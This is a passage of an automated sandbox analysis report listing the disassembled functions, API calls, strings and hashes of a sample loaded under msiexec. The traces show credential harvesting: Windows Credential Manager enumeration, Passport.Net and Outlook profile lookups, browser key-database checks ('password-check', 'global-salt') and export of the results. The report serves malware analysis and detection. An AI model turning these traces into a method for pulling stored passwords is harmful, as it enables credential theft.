                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 2726666094-3614832568
                                                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00403A88
                                                                                              • memset.MSVCRT ref: 00403AA1
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                              • strlen.MSVCRT ref: 00403AE9
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1786725549-0
                                                                                              • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                              • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                              • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                              • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                              APIs
                                                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID: global-salt$password-check
                                                                                              • API String ID: 231171946-3927197501
                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                              • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                              • String ID:
                                                                                              • API String ID: 19018683-0
                                                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID:
                                                                                              • API String ID: 438689982-0
                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044495F
                                                                                              • memset.MSVCRT ref: 00444978
                                                                                              • memset.MSVCRT ref: 0044498C
                                                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                              • strlen.MSVCRT ref: 004449A8
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                              • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                              • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset$strlen
                                                                                              • String ID:
                                                                                              • API String ID: 2142929671-0
                                                                                              • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                              • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                              • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                              • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                              APIs
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                              • strlen.MSVCRT ref: 0040F7BE
                                                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                              • String ID: Passport.Net\*
                                                                                              • API String ID: 2329438634-3671122194
                                                                                              • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                              • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                              APIs
                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                              • String ID: Personalities
                                                                                              • API String ID: 2103853322-4287407858
                                                                                              • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                              • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastMessagesprintf
                                                                                              • String ID: Error$Error %d: %s
                                                                                              • API String ID: 1670431679-1552265934
                                                                                              • Opcode ID: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                              • Instruction ID: a7eabb7ac59324d00fe13b249bdc4a7432a02f94c8438c44d3dfd779c6ab1540
                                                                                              • Opcode Fuzzy Hash: 01084951b307502bfaf43d4fbd3e54dffba0eab1b535d90173241ec551fbeaa7
                                                                                              • Instruction Fuzzy Hash: AEF0A77A8001086BDB10A7A4DC05FA676BCBB44344F1500B6B945F2151EA74DA058F98
                                                                                              APIs
                                                                                              Strings
                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                              • API String ID: 3510742995-272990098
                                                                                              • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                              • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                              • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                              • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: H
                                                                                              • API String ID: 2221118986-2852464175
                                                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                              • API String ID: 3510742995-3170954634
                                                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                              APIs
                                                                                                • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                              • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$memcpy
                                                                                              • String ID: @ $SQLite format 3
                                                                                              • API String ID: 231171946-3708268960
                                                                                              • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                              • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                              • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                              • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: winWrite1$winWrite2
                                                                                              • API String ID: 438689982-3457389245
                                                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: winRead
                                                                                              • API String ID: 1297977491-2759563040
                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0044955B
                                                                                              • memset.MSVCRT ref: 0044956B
                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: gj
                                                                                              • API String ID: 1297977491-4203073231
                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                              APIs
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                              • memset.MSVCRT ref: 0040AB9C
                                                                                                • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                              • sprintf.MSVCRT ref: 0040ABE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                              • API String ID: 3337535707-2769808009
                                                                                              • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                              • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                              • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                              • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                              APIs
                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1189762176-0
                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
